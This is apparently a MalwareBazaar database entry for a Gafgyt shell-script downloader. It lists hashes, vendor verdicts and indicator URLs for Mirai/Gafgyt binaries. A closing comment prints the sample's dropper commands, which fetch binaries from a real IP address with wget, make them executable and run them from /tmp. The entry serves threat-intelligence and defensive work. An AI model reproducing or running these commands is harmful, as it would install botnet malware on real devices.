MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a02b076dd32c91403c500e9c8e8ee3fd36e29725f4bd3336e9d31b38a51a85b6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Gafgyt


Vendor detections: 6



SHA256 hash: a02b076dd32c91403c500e9c8e8ee3fd36e29725f4bd3336e9d31b38a51a85b6
SHA3-384 hash: 701551c2f6c2e68d57876d65324202c5b293be5a65b2a276c8ad4f2cb123c0f12b9e089eacb42f11284c9e7d8d4b5dd1
SHA1 hash: 676a118f9f26c21e43e4ad6dd218e01087f836ff
MD5 hash: 5957e5d91936d38be2a9528ee1dd6e56
humanhash: south-timing-colorado-muppet
File name: fx
Signature: Gafgyt
File size: 1'589 bytes
First seen: 2024-12-27 22:51:06 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 24:EwnmxwfKWEjwJoo6soe3goSsoe36Pe3efyoe3ed5Qe38ATz8Wve3NU/e3Y:EwQwf6jwJt6m1Sm60efy7ed58u8WU+EY
TLSH: T1F63187132B4C34F4B7CDA50AB2A3DBE669DDC09F2A030705D83982EA7C95A241E35E30
Magika: shell
Reporter: abuse_ch
Tags: gafgyt sh

IOCs

URL: http://185.157.247.35/mips
Malware sample (SHA256 hash): 4fc73b02bd0cc4d44ee8da03ce5ab8b74fb67409fb223c3f36b06dc22dc0dd74
Signature: Gafgyt
Tags: 32-bit elf gafgyt mirai

URL: http://185.157.247.35/arm7
Malware sample (SHA256 hash): d2ea0eed1f82458ed76a956ca3fd1f72d1c1e29b40a6118d1e5f1e6d78418077
Signature: Mirai
Tags: elf mirai

URL: http://185.157.247.35/arm
Malware sample (SHA256 hash): 2f66b28645b910c0fcb7a751e9a0dad86fd2be825d07f45dd6ab086ec2eeafc0
Signature: Mirai
Tags: 32-bit elf mirai

Intelligence


File Origin
# of uploads: 1
# of downloads: 95
Origin country: DE

Vendor Threat Intelligence

Verdict: Malicious
Score: 93.3%
Tags: downloader adware mirai virus

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: anti-debug evasive

Result
Verdict: UNKNOWN
Threat name: Linux.Downloader.Generic
Status: Suspicious
First seen: 2024-12-27 23:02:22 UTC
File Type: Text
AV detection: 7 of 23 (30.43%)
Threat level: 3/5

Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
Gafgyt
sh a02b076dd32c91403c500e9c8e8ee3fd36e29725f4bd3336e9d31b38a51a85b6 (this sample)

Delivery method: Distributed via web download

Comments



commented on 2024-12-28 08:14:50 UTC

cd /tmp; rm -rf mips; wget http://185.157.247.35/mips; chmod 777 mips; ./mips fbnew.mips;
cd /tmp; rm -rf arm7; wget http://185.157.247.35/arm7; chmod 777 arm7; ./arm7 fbnew.arm;
cd /tmp; rm -rf arm; wget http://185.157.247.35/arm; chmod 777 arm; ./arm fbnew.arm;